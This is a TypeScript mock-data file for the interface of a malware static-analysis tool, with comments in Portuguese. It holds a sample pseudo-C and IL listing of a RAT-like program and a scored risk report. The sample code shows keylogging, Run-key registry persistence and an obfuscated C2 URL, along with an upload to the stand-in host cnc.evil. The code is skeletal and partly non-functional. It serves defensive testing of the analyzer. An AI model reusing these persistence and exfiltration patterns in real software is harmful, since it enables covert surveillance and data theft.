// --- Módulo: mockDemo.ts ---
import type { AnalysisResult } from "@/lib/analysis";

// --- Resultado mock para testar layout sem backend ---
export const MOCK_DEMO_RESULT: AnalysisResult = {
  fileName: "demo.cs",
  cCode: [
    "// pseudo-C gerado a partir de .NET (mock)",
    "#include <stdio.h>",
    "#include <windows.h>",
    "#include <wininet.h>",
    "",
    "int read_config() {",
    "    FILE *f = fopen(\"config.ini\", \"r\");",
    "    if (!f) {",
    "        printf(\"[!] Falha ao abrir config.ini\\\\n\");",
    "        return -1;",
    "    }",
    "    char buf[256];",
    "    while (fgets(buf, sizeof(buf), f)) {",
    "        printf(\"[cfg] %s\", buf);",
    "    }",
    "    fclose(f);",
    "    return 0;",
    "}",
    "",
    "// String ofuscada: concatenação em runtime",
    "char* get_c2_url() {",
    "    char *a = \"ht\";",
    "    char *b = \"tp\";",
    "    char *c = \"s://\";",
    "    char *d = \"cnc.evil\\\\n\";",
    "    return strcat(strcat(strcat(a, b), c), d);",
    "}",
    "",
    "int capture_keystrokes() {",
    "    SHORT state = GetAsyncKeyState(VK_SHIFT);",
    "    if (state & 0x8000) {",
    "        GetAsyncKeyState(VK_CONTROL);",
    "        printf(\"[key] shift+ctrl\\\\n\");",
    "    }",
    "    return 0;",
    "}",
    "",
    "void persist_registry() {",
    "    HKEY hk;",
    "    RegOpenKeyExA(HKEY_CURRENT_USER, \"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, KEY_SET_VALUE, &hk);",
    "    RegSetValueExA(hk, \"Updater\", 0, REG_SZ, (BYTE*)\"C:\\\\evil.exe\", 12);",
    "    RegCloseKey(hk);",
    "}",
    "",
    "void suspicious_function() {",
    "    HANDLE h = CreateFileA(\"log.txt\", GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);",
    "    if (h == INVALID_HANDLE_VALUE) return;",
    "    const char *msg = \"dados suspeitos\";",
    "    DWORD written = 0;",
    "    WriteFile(h, msg, (DWORD)strlen(msg), &written, NULL);",
    "    CloseHandle(h);",
    "}",
    "",
    "void exfil_data(const char *path) {",
    "    HINTERNET hi = InternetOpenA(\"Mozilla/5.0\", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);",
    "    HINTERNET url = InternetOpenUrlA(hi, get_c2_url(), NULL, 0, 0, 0);",
    "    if (url) { InternetCloseHandle(url); }",
    "    InternetCloseHandle(hi);",
    "}",
    "",
    "int main() {",
    "    read_config();",
    "    capture_keystrokes();",
    "    persist_registry();",
    "    suspicious_function();",
    "    exfil_data(\"C:\\\\data\\\\\");",
    "    return 0;",
    "}",
  ].join("\n"),
  ilCode: [
    "// IL/Bytecode de exemplo (mock)",
    ".method public hidebysig static void  Main() cil managed",
    "{",
    "  .entrypoint",
    "  .maxstack  2",
    "  .locals init ([0] string msg, [1] int32 V_1)",
    "  IL_0000:  ldstr      \"Hello world\"",
    "  IL_0005:  stloc.0",
    "  IL_0006:  call       void Program::ReadConfig()",
    "  IL_000b:  call       void Program::CaptureKeystrokes()",
    "  IL_0010:  call       void Program::PersistRegistry()",
    "  IL_0015:  call       void Program::SuspiciousFunction()",
    "  IL_001a:  ldstr      \"C:\\\\data\\\\\"",
    "  IL_001f:  call       void Program::ExfilData(string)",
    "  IL_0024:  ldc.i4.0",
    "  IL_0025:  ret",
    "}",
    ".method private hidebysig static void ReadConfig() cil managed",
    "{",
    "  .maxstack 2",
    "  IL_0000:  ldstr \"config.ini\"",
    "  IL_0005:  call class [mscorlib]System.IO.FileStream [mscorlib]System.IO.File::OpenRead(string)",
    "  IL_000a:  pop",
    "  IL_000b:  ret",
    "}",
    ".method private hidebysig static void CaptureKeystrokes() cil managed",
    "{",
    "  .maxstack 8",
    "  IL_0000:  ldc.i4.s 0x10",
    "  IL_0002:  call int32 [System]System.Windows.Forms.Keys::get_ShiftKey()",
    "  IL_0007:  call int32 [user32]GetAsyncKeyState(int32)",
    "  IL_000c:  pop",
    "  IL_000d:  ret",
    "}",
    ".method private hidebysig static void PersistRegistry() cil managed",
    "{",
    "  .maxstack 4",
    "  IL_0000:  ldstr \"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\"",
    "  IL_0005:  ldc.i4.1",
    "  IL_0006:  call class [Microsoft.Win32]Microsoft.Win32.RegistryKey [Microsoft.Win32]Microsoft.Win32.Registry::OpenSubKey(string, bool)",
    "  IL_000b:  ldstr \"Updater\"",
    "  IL_0010:  ldstr \"C:\\\\evil.exe\"",
    "  IL_0015:  callvirt instance void RegistryKey::SetValue(string, object)",
    "  IL_001a:  ret",
    "}",
    ".method private hidebysig static void ExfilData(string path) cil managed",
    "{",
    "  .maxstack 2",
    "  IL_0000:  ldarg.0",
    "  IL_0001:  call class [System.Net]System.Net.WebClient [System.Net]WebClient::Create()",
    "  IL_0006:  ldstr \"https://cnc.evil/upload\"",
    "  IL_000b:  callvirt instance void WebClient::UploadString(string, string)",
    "  IL_0010:  ret",
    "}",
  ].join("\n"),
  report: [
    "RELATÓRIO DE ANÁLISE ESTÁTICA (mock)",
    "=====================================",
    "",
    "INFORMAÇÕES DO FICHEIRO",
    "Nome: demo.cs",
    "Tamanho: 128 KB (estimado)",
    "MD5: a1b2c3d4e5f6789012345678901234ab",
    "SHA256: 7f83b1657ff1fc53b92dc18148a1d65dfc2d4b1fa3d677284addd200126d9069",
    "Tipo: .NET assembly (C#) com pseudo-C gerado a partir de IL",
    "",
    "SCORE DE RISCO GLOBAL",
    "Score: 92/100",
    "Nível: CRÍTICO",
    "Descrição: o ficheiro apresenta múltiplos indicadores de RAT/stealer: keylogging, persistência por registo, exfiltração de dados, C2 e ofuscação de strings.",
    "",
    "Detalhes do Score:",
    "  - Suspicious Imports: 4 ocorrências = 15/15 pontos",
    "  - Suspicious Functions: 6 ocorrências = 18/18 pontos",
    "  - File I/O suspeito: 3 ocorrências = 10/10 pontos",
    "  - Obfuscation: 2 ocorrências = 4/10 pontos",
    "  - Network: 2 ocorrências = 10/10 pontos",
    "  - Persistência: 1 ocorrência = 8/10 pontos",
    "  - YARA: 2 ocorrências = 10/10 pontos",
    "",
    "RESUMO DAS CATEGORIAS",
    "- Suspicious Imports (4 ocorrências, 15/15 pontos)",
    "- Suspicious Functions (6 ocorrências, 18/18 pontos)",
    "- File I/O suspeito (3 ocorrências, 10/10 pontos)",
    "- Obfuscation (2 ocorrências, 4/10 pontos)",
    "- Network (2 ocorrências, 10/10 pontos)",
    "- Persistência (1 ocorrência, 8/10 pontos)",
    "- YARA (2 ocorrências, 10/10 pontos)",
    "",
    "ANÁLISE ESTÁTICA",
    "Imports Suspeitos:",
    "  - GetAsyncKeyState (user32)",
    "  - CreateFileA, WriteFile (kernel32)",
    "  - RegOpenKeyExA, RegSetValueExA (advapi32)",
    "  - InternetOpenA, InternetOpenUrlA (wininet)",
    "",
    "Indicadores C&C / Rede:",
    "  - URL de comando e controlo referenciada (get_c2_url)",
    "  - Uso de WinInet para comunicação HTTP",
    "",
    "DETALHE DAS CATEGORIAS",
    "## Suspicious Imports: 4 ocorrências = 15/15 pontos",
    "- Uso de GetAsyncKeyState nas linhas 42-43",
    "- Uso de CreateFileA na linha 58",
    "- Uso de WriteFile na linha 62",
    "- Uso de RegOpenKeyExA/RegSetValueExA nas linhas 51-52",
    "",
    "## Suspicious Functions: 6 ocorrências = 18/18 pontos",
    "- Função capture_keystrokes com padrão de keylogger",
    "- Função persist_registry altera Run para persistência",
    "- Função suspicious_function escreve em log.txt",
    "- Função exfil_data usa InternetOpenUrl para C2",
    "- get_c2_url constrói URL de forma ofuscada",
    "",
    "## File I/O suspeito: 3 ocorrências = 10/10 pontos",
    "- Escrita em log.txt na linha 58",
    "- Leitura de config.ini na linha 8",
    "- Caminho C:\\\\evil.exe em RegSetValueEx na linha 52",
    "",
    "## Obfuscation: 2 ocorrências = 4/10 pontos",
    "- String concatenation obfuscation em get_c2_url (linhas 27-30)",
    "- C# string concatenation: 4 ocorrências",
    "",
    "## Network: 2 ocorrências = 10/10 pontos",
    "- Chamada a InternetOpenA/InternetOpenUrlA em exfil_data",
    "- URL https://cnc.evil/upload no IL",
    "",
    "## Persistência: 1 ocorrência = 8/10 pontos",
    "- Escrita em HKCU\\\\...\\\\Run (persist_registry)",
    "",
    "YARA",
    "Regras que fizeram match:",
    "  - rule RAT_Keylogger { ... } (linhas 40-48)",
    "  - rule C2_HTTP_Beacon { ... } (linhas 65-70)",
    "",
    "CONCLUSÃO",
    "O ficheiro apresenta nível de risco CRÍTICO. Recomenda-se análise dinâmica em sandbox e quarentena.",
  ].join("\n"),
  riskScore: 92,
  riskLevel: "Crítico",
  flaggedIndicators: ["GetAsyncKeyState", "CreateFileA", "WriteFile", "RegOpenKeyExA", "RegSetValueExA", "InternetOpenA", "InternetOpenUrlA", "get_c2_url", "exfil_data"],
  obfuscationIndicatorCount: 2,
  flaggedFunctions: [
    { name: "read_config", id: "read_config:5-20", startLine: 5, endLine: 20, indicators: [], score: 6, severity: "BAIXO", reasons: ["I/O simples (leitura de config)"] },
    { name: "get_c2_url", id: "get_c2_url:24-32", startLine: 24, endLine: 32, indicators: ["String concatenation obfuscation"], score: 28, severity: "MÉDIO", reasons: ["Construção de URL de forma ofuscada (concatenação)"] },
    { name: "capture_keystrokes", id: "capture_keystrokes:36-45", startLine: 36, endLine: 45, indicators: ["GetAsyncKeyState"], score: 86, severity: "CRÍTICO", reasons: ["Keylogging via GetAsyncKeyState"] },
    { name: "persist_registry", id: "persist_registry:48-55", startLine: 48, endLine: 55, indicators: ["RegOpenKeyExA", "RegSetValueExA"], score: 74, severity: "ALTO", reasons: ["Persistência via registo (Run)"] },
    { name: "suspicious_function", id: "suspicious_function:57-65", startLine: 57, endLine: 65, indicators: ["CreateFileA", "WriteFile"], score: 46, severity: "ALTO", reasons: ["Escrita suspeita em ficheiro (log)"] },
    { name: "exfil_data", id: "exfil_data:67-73", startLine: 67, endLine: 73, indicators: ["InternetOpenA", "InternetOpenUrlA"], score: 58, severity: "ALTO", reasons: ["Comunicação externa via WinInet"] },
  ],
};
